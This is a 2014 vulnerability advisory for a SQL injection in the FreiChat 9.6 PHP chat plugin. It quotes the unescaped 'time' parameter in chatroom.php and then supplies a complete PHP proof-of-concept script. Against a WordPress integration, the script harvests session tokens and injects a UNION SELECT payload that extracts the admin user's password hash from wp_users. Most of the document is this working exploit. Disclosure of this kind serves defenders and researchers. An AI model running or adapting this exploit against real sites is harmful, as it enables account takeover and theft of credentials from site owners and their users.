# Exploit Title: FreiChat 9.6 SQL Injection
# Date: 27-11-2014
# Software Link: http://codologic.com/page/freichat-free-php-chat-script-software
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps

1. Description
  
$_GET['time'] is not escaped.

File: freichat\server\plugins\chatroom\chatroom.php

$get_mesg = $this->get_messages($_GET['time']);
public function get_messages($time) {

    $frm_id = $this->frm_id;
    $result = array();

    if ($time == 0) {
    //$get_mesg_query = "SELECT DISTINCT * FROM frei_chat WHERE frei_chat.\"to\"=" . $frm_id . "AND time<2 order by time";
    } else {
        $get_mesg_query = "SELECT * FROM frei_chat WHERE frei_chat.\"to\"=" . $frm_id . " AND time>" . $time . " AND message_type<>1 order by time ";
        $result = $this->db->query($get_mesg_query)->fetchAll();
    }


    return $result;
}

http://security.szurek.pl/freichat-96-sql-injection.html

2. Proof of Concept

Example for WordPress integration (it will give you admin password):

<?php
/*
 * Kacper Szurek
 * http://security.szurek.pl
 */
function hack($url, $cookie, $sql ){

$ckfile = dirname(__FILE__) . $cookie;
$cookie = fopen($ckfile, 'w') or die("Cannot create cookie file");

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$content = curl_exec($ch);

if (preg_match('|http://(.*?)/freichat/client/main\.php\?id=([a-zA-Z0-9]+)&xhash=([a-zA-Z0-9]+)|i', $content, $matches)) {
    curl_setopt($ch, CURLOPT_URL, 'http://'.$matches[1].'/freichat/server/freichat.php?freimode=getmembers&id='.$matches[2].'&xhash='.$matches[3]);
    $content = curl_exec($ch);

    curl_setopt($ch, CURLOPT_URL, 'http://'.$matches[1].'/freichat/server/freichat.php?freimode=loadchatroom&id='.$matches[2].'&xhash='.$matches[3].'&in_room=1&chatroom_mesg_time=1&custom_mesg=1&time='.urlencode($sql));

    $content = curl_exec($ch);

    if (preg_match('|"room_id":"([^"]+)"|', $content, $output)) {
        echo "WordPress password user ID=1: ".$output[1];
    } else {
        echo "FAIL";
    }
}

curl_close( $ch );
}

// URL to WordPress main URL
$url = "http://wp/";

// SQL Payload
$sql = "1 UNION SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, user_pass FROM wp_users WHERE ID=1 -- ";

$cookie = "/cookie.txt";

hack($url, $cookie, $sql);